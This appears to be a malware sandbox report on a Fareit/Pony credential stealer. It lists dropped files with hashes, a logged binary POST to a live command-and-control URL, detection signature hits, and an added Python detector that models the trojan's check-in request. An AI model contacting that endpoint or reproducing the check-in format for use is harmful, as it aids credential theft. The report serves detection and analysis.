SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jib=xce
text
MD5: 964a0a2bbe3a33ea3845207aac054aca
SHA256: 5c2eba2adf376d4927073b241deb044abf3b17f9ea279bd456c11a4c841b8dc5
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\apt.jpg
text
MD5: 868f9ed81767b414bdd5dbf3e2db9279
SHA256: e2763247e7f4643d5e7a27665f5ec09340342b22144f523b7a0c3c6b7bc25dde
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\cxe.dat
text
MD5: 432ce4c0a3fc3c0f829cc802451dd09a
SHA256: 0015ef0ec7655c718f2e01e3e63818e3095710e5efff5dca85a80899765d6c1b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\kpr.xl
text
MD5: f45abe91078c05d0760d8612b670593f
SHA256: 87269bdff217490f644d49188fb8c8a32119b3cb35625bbcbce3f7ade03c23dd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\vkd.ico
text
MD5: 945b0feea6eb7d0529fc01bcefc6da34
SHA256: cf610a28e3d4ac1da314fb01fa67944eb0892d35b92eed13ff6a6c4e1b23c260
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\btg.xl
text
MD5: 54967611c24137b109839144c2223548
SHA256: 47372e8275cff0d1110e4447875f1e5013db456e45509737ed888bd08936c1d7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\stx.dat
text
MD5: a738599a50d77196ae0b935c9331570b
SHA256: 2a3c821d011d540870d6c313b4fb84520932f7516965cc1a76eaef11345c71c2
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\hrd.ico
text
MD5: 80d962789e175804c83eea3cc36dcdfb
SHA256: 4d2d7d3e8241aada29f0bd01030c48e95141a6a43293c43764a8329deec3dcb9
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\eun.xl
text
MD5: 51a64c1554426a9615e7997efb9d45dd
SHA256: b248453fba9a89a756f3ac5d7e94599806a27a6b2419ab48fec1899225b01fea
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\apd.xl
text
MD5: 7e85259f51a2661447efb3aebe525daa
SHA256: 5e545be86e451fa4735bd8061ad79ea1b87aad5956f9102d879620e7d913f7da
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\awl.mp4
text
MD5: 07662b4bbccd392e4dac4504b3bbbc18
SHA256: b1efc59c598b9a054969ebed9ab6bcac9f39efebfd6bd3d99b48f9624432c0bd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gdk.icm
text
MD5: cf09d82b9b8ab8706478815b00fafc3f
SHA256: 225e03ff56db9ee71ef629df017e7a462b7d67eca46dd8de74c511d90dd6bb2d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\mlw.xl
text
MD5: 431bad937e1b0334ac8a14dba7aca2aa
SHA256: ea4e2222a104a6f17b2f6331bebddbacf5a889a5e208738ea41ae9c4b0398da7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qwp.mp4
text
MD5: dce95a5ac71fe38cbe11c014ba63166c
SHA256: a815064de5ba6cb6eeca00e8756a5f99e08bfb80f5fc6270d9103986aec385bb
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\ltl.ppt
text
MD5: e3f2f92803e1bb5a02004c623986166b
SHA256: f340d9d939892ae152676f1cbab2d60c1e96016df5f22e5f1a6d27011c16224d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wjv.mp4
text
MD5: 3062559c70b9345ad38b51007d48c849
SHA256: 6ae28e2fe9e6922d991f72b244f06f460cf108637579bb87e971d036b6942cd1
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xqv.pdf
text
MD5: 767e7a75bca404860b9c401cf1a1cf29
SHA256: bfeae2a21aba4571daac1a3fdb760fedab4504920e1558fe0d13e3e3f7e294e3
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\pje.docx
text
MD5: c82a12c7d625a61c64543a06d52308c7
SHA256: 4fe894e16b24d19d66e53fe634adcbfbe22850d9e56ba62753c968a634a9e75b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qfb.txt
text
MD5: 0b2e4f7b0facd9749c13de61b98ff068
SHA256: 4992a643b205df938f9acb5c6702d7c82124e931f923e5efa2532fa24b053558
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gvm.icm
text
MD5: 043d1ac27007f0cdc57d7de1165f7fcd
SHA256: 9785f4db55e0b438032450dbb25cfcaa74f153717db3452348e03db962fc27f6
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xkp.ico
text
MD5: e8a973ce18909e590f82596455d2602d
SHA256: f4c81aacd4135e3331896ddedc35881639eed43d26dbcd1dc2b8216427de4cac
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wtc.xl
text
MD5: 0d2972cbfde7df629b00cee1bf0d7961
SHA256: fcb4a686e089fef78cc5adc96aa5e2b8e9bdec101f8a191fcd062d046ae928c0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\lso.ppt
text
MD5: bc744621fa808f7e5a3212c980207b18
SHA256: 7bac6c034699da81387aeaff0d43287e4dd4abffeb6eccc40e30d96ef8afa84c
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\fha.icm
text
MD5: 22d8c417269dd2949b166d59ab29cceb
SHA256: aa4042c69d52037888573677f286cb7d7f96eff2229caa2b3aa5277dddf36313
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qpe.xl
text
MD5: 00a5a3e4328f1126dfbd97a2d58a3a65
SHA256: 6f574cf1ae0523d13f17aaf927b209a425fe0625163da33c8b59dc444b69335b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jac.ppt
text
MD5: 5fa8a38a622303c303bc59ded1637c9e
SHA256: 22a78f65443fa12f2569f70c128d32f338cb7c048d1b679fe4af8d651ded0acd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\nmn.bmp
text
MD5: b3877672a80725aaec2e6bb1ec42f93f
SHA256: 58a09d046b9e8ecd13c0fe1192f747af4c50ca119ecb7a6c0e4346df9b6258a1
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\een.mp3
text
MD5: b2e6422d814e4966de30e7a3f90e8c1d
SHA256: ee2c07cdb04fe6c2a327681c48c39d29a79ffe1f43f5c0cb098cf2fcb91080e0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\dir.jpg
text
MD5: e7397f7d3fbdf7e965d6905cb11b4a53
SHA256: 4292b284d468e23f5a5237228fcc6757d5e4e609fbc43970407d5fd38d422114
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\csj.bmp
text
MD5: 65b134a8dd7a7a4d45f01c1fd30a8dbd
SHA256: 755b53b400b72e1cb1ad4acfa96f5d3cd7e0236041821527790c3bc07cec2e01
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\slk.pdf
text
MD5: d867d0455ec86706f27044f81569c66c
SHA256: 49cb20241344d86f47456ade264339600ecde5c3b449082677b5fb656307cbc7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\aaj.jpg
text
MD5: 8f9cfd119e5b82f2e38e7c9b3c6c2536
SHA256: 4c670b1590ef33e133b867c0bb81ef38d8b90a69fdbf8d04e899ca110ca40612
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wdf.mp3
text
MD5: 871412a0e9bb29e4768ffa44ef0fd0d3
SHA256: f50a5ba0ce9be3f30d8757298c291f45ed68d3c76381dc538e0a1d28d9e85a9b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\lch.bmp
text
MD5: d14465350c17a331ecb38ef3f33f6802
SHA256: ef4265a353430f19cd9cd524a552ebab58f09d6223a7eca525f1558e8803c738
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xtp.ico
text
MD5: e31b13f8aaa172833a82155acda616ce
SHA256: 661bd6103b89391402e290145a8c9bc8a4f61f9271333cc7c7bf13c354020507
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\vci.docx
text
MD5: c2069426b3cf8d8ef02bbddfdf8a0ca1
SHA256: 1a31f9dba0a08b661157b54d7d5020d598ec853242f5d220968090dac23eaa33
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qcm.mp4
text
MD5: 54916a157a111880a26c2a85e3a72637
SHA256: 6d030add5ebcbf4233eddf768ae92e359dccc53da36168f46d1cf22d0968096c
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\skj.pdf
text
MD5: a2c3579b6193a4f1daac864859fb007d
SHA256: 73270397197bc844632e9c01b54ed0e4cb7de0d6d06b05e4a9c78763ace70c79
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\sci.bmp
text
MD5: 64eafb8c0ecb5ee2a0401db4d708c24f
SHA256: 8a0c47f9ff776dcd0a97f9d5b69f99554b4fbd80a213cf4f62be4afbfb9bb7ca
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\kdp.ico
text
MD5: 916a9321d0cb0287cc74ff106bc24f5b
SHA256: 6b988d64f82decf8f47ceea9e2c332087f794fca5c969ab9b1d51b05957231e0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jid.docx
text
MD5: bb55f95cd3f671b6ed26f98d8f9e80bf
SHA256: 5cb786bcb4cf0f17422b05d3dc7ddda1ab916cc03002f351fd0c5d0037ab4a82
3708
RegSvcs.exe
C:\Users\admin\AppData\Local\Temp\6142828.bat
text
MD5: 3880eeb1c736d853eb13b44898b718ab
SHA256: 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qgc.icm
text
MD5: a3b18d17757a1be01db68811aad192d0
SHA256: 85c641708e7246170aaaf1ff57dab227cde686a9b3d4a169939a09cd87895731
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wgn.ppt
text
MD5: c93d7cba7142e64ef440f55f950e60a4
SHA256: 76f0f41522bf4f9f15b1160952525a1af7355e0db19dac0635b2adfea46e1480
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\nfb.jpg
text
MD5: d9229c46969501683e84264dfc900599
SHA256: 1741b7cfe956aba10a735941a792663ceb20c6a15ad1cd1c0dd793abd91b86b4
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gri.mp4
text
MD5: a6404d0e719a5c50a3a12cd1aae3f572
SHA256: 72a0bf9f348ea96902340e99c742d63d9ac9f579177b32ad1f7eb88c9b34c6dc
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\bgv.docx
text
MD5: 3d9066adcf210a54644c67ee857f3860
SHA256: 109a945493aee126cd4151c9f09ecbd140fb44bf3fe3ceff1102cc18f10dece2
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xba.pdf
text
MD5: 79daa2f71c8217a1649861ee8833f7bd
SHA256: 1d88fb6fbbcb513c8f7a669d5d4e37f90fe166d2cc4e107d27891920d211c3bf
3440
hhl.exe
C:\Users\admin\AppData\Local\Temp\92255107\KZLRV
text
MD5: 0e6f28a02ade3b07d8793c2476bc358c
SHA256: f18f111910b8f75603f517f258a3854ed519d52a8eecfa711ceaca6eaecb72e6

More information about the static content, and the files themselves for download, is available in the full report.

Network activity

HTTP(S) requests: 1
TCP/UDP connections: 1
DNS requests: 1
Threats: 8

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3708 RegSvcs.exe POST –– 111.90.144.65:80 http://aveiro-maroc.cf/ser/gate.php MY binary –– –– malicious

The PCAP, network streams, HTTP content and more can be downloaded and analyzed in the full report.

Connections

PID Process IP ASN CN Reputation
3708 RegSvcs.exe 111.90.144.65:80 Shinjiru Technology Sdn Bhd MY malicious

DNS requests

Domain IP Reputation
aveiro-maroc.cf 111.90.144.65 malicious

Threats

PID Process Class Message
–– –– Potentially Bad Traffic ET INFO DNS Query for Suspicious .cf Domain
3708 RegSvcs.exe Potential Corporate Privacy Violation ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Trojan Generic - POST To gate.php with no referer
3708 RegSvcs.exe Potentially Bad Traffic ET INFO HTTP POST Request to Suspicious *.cf Domain
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Fareit/Pony Downloader Checkin 2
3708 RegSvcs.exe A Network Trojan was detected ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
3708 RegSvcs.exe A Network Trojan was detected MALWARE [PTsecurity] Fareit/Pony CnC Server stdResponse

1 ETPRO signature is available in the full report.
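Every threat hit above is a property of the single HTTP request in the report: a POST to gate.php with no Referer, a User-Agent claiming MSIE 5 on Windows 98, a .cf domain, and a binary body. The following Python is an added example and is not part of the ANY.RUN report: it parses a raw request and scores those properties, which is the same logic the ET rules express as signatures. The request is constructed to mirror the HTTP row above; the User-Agent value is an assumption derived from the signature name (the report shows signature names, not the captured header), and the body is dummy bytes where the real Pony check-in carries the encrypted credential report.

```python
from typing import Dict, List, Tuple

# Constructed request modelled on the HTTP row in this report. The User-Agent
# is assumed from the ET signature name; the 16-byte body is a placeholder.
SAMPLE_CHECKIN = (
    b"POST /ser/gate.php HTTP/1.0\r\n"
    b"Host: aveiro-maroc.cf\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 16\r\n"
    b"\r\n" + b"\x00" * 16
)

# Constructed benign request for comparison.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0\r\n"
    b"Referer: https://example.com/\r\n\r\n"
)

# Freenom zones the "Suspicious .cf Domain" style ET INFO rules key on (assumed list).
FREE_TLDS = {"cf", "ga", "gq", "ml", "tk"}


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def score_checkin(raw: bytes) -> List[str]:
    """Return the list of Pony check-in properties present in the request."""
    method, path, headers, body = parse_request(raw)
    hits: List[str] = []
    host = headers.get("host", "").lower()
    ua = headers.get("user-agent", "")
    tld = host.rsplit(".", 1)[-1]

    # ET TROJAN "POST To gate.php with no referer" and the Fareit/Pony checkin rules
    if method == "POST" and path.rsplit("/", 1)[-1].lower() == "gate.php":
        hits.append("POST to gate.php")
        if "referer" not in headers:
            hits.append("no Referer on gate.php POST")
    # ET POLICY "Windows 98 User-Agent" / ET TROJAN "HTTP Library MSIE 5 Win98"
    if "MSIE 5" in ua and "Windows 98" in ua:
        hits.append("legacy MSIE 5 / Windows 98 User-Agent")
    # ET INFO "Suspicious .cf Domain"
    if tld in FREE_TLDS:
        hits.append(f"free TLD .{tld}")
    # The report's Type column: an opaque binary POST body
    if method == "POST" and headers.get("content-type", "").startswith("application/octet-stream") and body:
        hits.append("binary POST body")
    return hits


if __name__ == "__main__":
    for label, req in (("check-in", SAMPLE_CHECKIN), ("benign", BENIGN_REQUEST)):
        print(label, score_checkin(req))
```

Any one of these properties is noisy on its own; alert on the combination, and join it to the host-side finding that RegSvcs.exe originated the connection, because the process name by itself (a signed Microsoft binary) would pass a naive allow-list.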

Debug output strings

No debug info.